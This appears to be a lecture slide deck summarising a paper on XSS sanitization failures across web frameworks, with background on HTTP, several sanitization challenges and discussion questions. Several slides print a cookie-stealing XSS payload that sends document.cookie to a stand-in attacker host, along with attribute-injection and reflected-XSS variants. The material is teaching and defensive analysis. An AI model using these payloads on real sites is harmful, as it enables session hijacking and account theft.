380 likes | 514 Views
THE BROKEN WEB. A Systematic Analysis of XSS Sanitization in Web Application Frameworks . Executive summary. Web page processing analyzed in detail Sanitization is quite complex Context sensitive 14 WEB frameworks analyzed None handle sanitization properly
E N D
THE BROKEN WEB A Systematic Analysis of XSS Sanitization in Web Application Frameworks
Executive summary • Web page processing analyzed in detail • Sanitization is quite complex • Context sensitive • 14 WEB frameworks analyzed • None handle sanitization properly • In some cases they give a false sense of security because the algorithm is wrong
HTTP background Basic HTTP operation • www.example.com:/sample.html • <h>Sample file</h> • <p>This is a sample</p> • GET www.example.com/sample.html • Sample file • This is a sample • Client sends request to server • Client displays file • Server locates and sends back file
HTTP background Server side scripting • Sample.php: • <?phpecho ‘<h>Sample file</h>’;echo ‘<p>This is a sample</p>’;?> • <h>Sample file</h><p>This is a sample</p> • Sample fileThis is a sample • GET www.example.com/sample.php • Server executes script • Client sends request • Client displays file • Server returns generated file
HTTP background Form management • Please send me your important financial information: • Name: Mr. Dummy__ • Soc: 234-23-5555 • Credit card number: • 1234-1234-1234-1234 • SUBMIT • Sample.php: • <?php • # save data somewhere • ….echo ‘<p>Now I own you.</p>’?> • POST www.example.com/sample.php?name=Mr.Dummy&soc=234-23-5555&credit=1234-1234-1234-1234 • Now I own you. • Server sends response page to client • Server executes script • User fills in fields and presses ‘Submit’ • Client sends data to server
HTTP background Client side scripting <html> <body> <h1>My First Web Page</h1> <script type="text/javascript"> document.write("<p>" + Date() + "</p>"); </script> </body> </html>
HTTP background Client side scripting <html> <body> <h1>My First Web Page</h1> <p>TueFeb 28 2012 14:28:07 GMT-0500 (EST)</p> </body> </html>
HTTP background Client side scripting My First Web Page Tue Feb 28 2012 14:28:07 GMT-0500 (EST)
XSS attack Server side code prints text entered by a user from an earlier session. Consider this code: • <?php • echo ‘<p>Note from ‘.$user.’</p>’ • echo ‘<p>’.$note.’</p>’ • ?> Suppose $note contains <script>document.write("<imgsrc=http://attacker.com/" + document.cookie + ">")</script> The sky is falling.
XSS attack The result is that the following is sent to your browser: • <p>Note from Mr. Apocalypse</p> • <p> • <script>document.write("<imgsrc=http://attacker.com/" + document.cookie + ">")</script>The sky is falling. • </p>
XSS attack Your browser displays the following: • Note from Mr. Apocalypse • [img] The sky is falling. And the attacker has gotten your cookie.
XSS attack The attacker simply needed to enter this script on the screen used to post the note. • Logged in as: Mr. Apocalypse • Text of message to post: • <script>document.write("<imgsrc=http://attacker.com/" + document.cookie + ">")</script>The sky is falling._______ Any website that echoes back a user input can be used for an XSS attack.
XSS attack • The following can be used to obtain the cookie for your bank account: <script>document.location='http://banking.com/search?name=<script>document.write("<imgsrc=http://attacker.com/" + document.cookie + ">")</script>'</script>
Sanitization One solution is to escape out sensitive characters <script>document.write("<imgsrc=http://attacker.com/" + document.cookie + ">")</script> becomes <script>document.write(“<imgsrc=http://attacker.com/" + document.cookie + “>”)</script> Problem: sanitization needs to be done in a context sensitive manner and the rules are very complex
Challenge 1: context sensitivity Consider this code: echo ‘<p>’.$note.’</p>’ Here one can replace ‘<‘ with < and ‘> with > to block attacks. However consider: echo ‘<imgsrc=‘.$url.’>’ Consider the following url: picture.jpg’ onLoad=‘document.location=…”
Challenge 2: Sanitizing nested contexts Consider this piece of php code: echo ‘<script> var x = ‘.$UNTRUSTED_DATA.’...</script>’ One needs to block both the possibility of a </script> and that of a ‘ to prevent attacks
Challenge 3: Browser transductions Consider: <div class=‘comment-box’onclick=‘displayComment(" UNTRUSTED",this)’> ... hidden comment ... </div> Even if all the “ characters are replaced with ", HTML 5 removes the encoding before passing the text to Javascript.
Challenge 4: Dynamic code Consider this program: function foo(untrusted) { document.write("<input onclick=’foo(" + untrusted + ")’ >"); } Evaluation generates html code that will repeat the call to the function.
Challenge 5: Character set issues +ADw- maps to < in UTF-7 The sanitizer needs to recognize the character set conversion
Challenge 6: everything else • MIME based XSS • Browser bugs • Capability leaks • Parsing inconsistencies • Browser extensions • Adobe flash is fairly buggy
Evaluation of web frameworks and applications • Subjects • 14 popular web application frameworks • 8 popular php applications • Evaluation • Auto-sanitization and/or sanitization libraries • Dynamic sanitization handling
Auto sanitization • 7 of 14 support auto sanitization • 4 of 7 of these perform context insensitive sanitization which is inherently unsafe • 14.8%-33.6% of output sinks fail to be protected by auto sanitization in 10 popular Django application
Context sensitive sanitization • Performed by 3 of 7 frameworks • GWT, Google Clearsilver, and Google Ctemplate • Involved a runtime parser that checked the context and applied the appropriate sanitization function • User needs to mark untrusted variables • No detailed analysis of reliability • I assume they worked reasonably well
Manual sanitization • Prone to error • Variables missed • Wrong sanitization function used
Dynamic code evaluation • Perform appropriate runtime checks before printing untrusted strings • Generally not supported by frameworks • Four frameworks provided static sanitization of untrusted strings within the context of Javascript constants
DOM based errors • Javascript can actually reference the content of a web page <h1>This page changes itself</h1> <a name=“xxx”>Original content</a> <script> document.anchors[0].innerHTML=“New content”; </script>
DOM based errors • Javascript can actually reference the content of a web page <h1>This page changes itself</h1> <a name=“xxx”>New content</a> <script> document.anchors[0].innerHTML=“New content”; </script>
DOM based errors • Consider this code: text = element.getAttribute(’title’); // ... elided ...desc= create_element(’span’, ’bottom’); desc.innerHTML= text; tooltip.appendChild(desc); This code read an element from the HTML, destroy escaping and reinsert it elsewhere To avoid bug: use of innerText to write or innerHTMLto read
DOM based errors • Ignored by frameworks • Cause many XSS vulnerabilities
Expressiveness of contexts in web applications • 8 php applications analyzed • 19-532KLOC • All applications emit untrusted data into all contexts • Applications sometimes employ different sanitizers for the same context • General conclusion: frameworks do not provide sufficient sanitization support
Manual sanitization expressiveness • 9 of 14 frameworks do not support contexts other than the generic HTML • 4 provided sanitizers for Javascript string context • 1 framework provided a sanitizer for Javascriptnumber and boolean contexts • None allow for sanitization of Javascript code • Only one framework allowed customization of the sanitizer within a context—the others had a pre-packaged sanitizer for all contexts
Correctness of sanitizers • Sanitizers prone to error • In frameworks they usually work on a “whitelist” model in which only structures following specific patterns are allowed • One framework uses a “blacklist” model in which specific strings are forbidden • Frameworks rely on canonical form into which all output is formatted to simplify sanitizers • The authors conclude that the “whitelist” approach should be researched. The “blacklist” approach is too error prone.
Related work • XSS analysis and defense • Server side code errors • Javascript code errors • Research identifies vulnerabilities • Untrusted data showing up in output • Improper sanitization • Server side solutions • BLUEPRINT, SCRIPTGARD, XSS-GUARD • Formalize web model to design sanitizers • Client side • XSS-Auditor • Analyze browser reference patterns to try and identify attacks • Does not separate trusted and untrusted data • Studies in sanitizer correctness • Manual process of adding sanitization is error prone • None provide a good underlying model for sanitizers • Taint tracking and security typed languages
Paper’s conclusions • Current frameworks do not properly manage sanitization • The paper suggests a future direction of producing a formal model of the browser’s behavior
Some later work • Saxena developed php analysis tools • Model checker – symbolic execution of php to try and find dangerous code • Static analysis—tries to identify and incorporate sanitizers based on the context of a print • Probably the better approach • Needs to be integrated with some sort of dynamic analysis
Discussion questions • What is the best approach for solving XSS? • In addition to technical issues, what practical issues need to be addressed to get a solution deployed? For example, asking everyone to rewrite their php code is going to be difficult. • Should the government get involved in regulating web sites to make sure basic protection standards are upheld?
XSS attack game • 2 teams • Source code available from www.cs.jhu.edu/~roe • Look for $_GET and $_POST variables for user input • Use MAMP to run